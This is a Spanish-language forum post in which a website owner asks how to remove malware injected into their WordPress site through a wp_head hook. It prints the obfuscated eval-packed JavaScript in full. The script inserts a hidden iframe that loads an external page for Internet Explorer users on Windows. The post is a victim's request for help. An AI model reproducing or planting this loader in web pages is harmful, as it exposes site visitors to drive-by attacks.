Codigo Malicioso
-
Hola, pongo aqui mi problema, por si alguien mas lo tiene y poder encontrar una solucion.
Ayer google me notificó que una de mis webs habia sido atacada con codigo malicioso. Es decir, algo o alguien ha inyectado codigo malicioso y que ataca a los usuarios que entran.
este es el codigo:
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
»:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
.toString(36))};if(!».replace(/^/,String)){while(c–){d[e(c
)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){retu
rn’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\
\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘i 9(){a=6.h(\’b\’);7(!
a){5 0=6.j(\’k\’);6.g.l(0);0.n=\’b\’;0.4.d=\’8\’;0.4.c=\’8\’
;0.4.e=\’f\’;0.m=\’w://z.o.B/C.D?t=E\’}}5 2=A.x.q();7(((2.3(
«p»)!=-1&&2.3(«r»)==-1&&2.3(«s»)==-1))&&2.3(«v»)!=-1){5 t=u(
«9()»,y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|M
akeFrameEx|element|yahoo_api|height|width|display|none|body|
getElementById|function|createElement|iframe|appendChild|src
|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
|userAgent|1000|fgsdgsd|navigator|ai|showthread|php|72241732
‘.split(‘|’),0,{}))
</script>Entre algunos hemos descubierto que el codigo viene de una accion llamada add_action(‘wp_head’). Pero no sabemos como eliminarlo.
En esta web he encontrado un poco mas de informacion, por si a alguien le resulta util. http://sucuri.net/new-malware-evalfunctionpacked.html
Bueno, espero vuestras respuestas, un saludo y muchas gracias!
- El debate ‘Codigo Malicioso’ está cerrado a nuevas respuestas.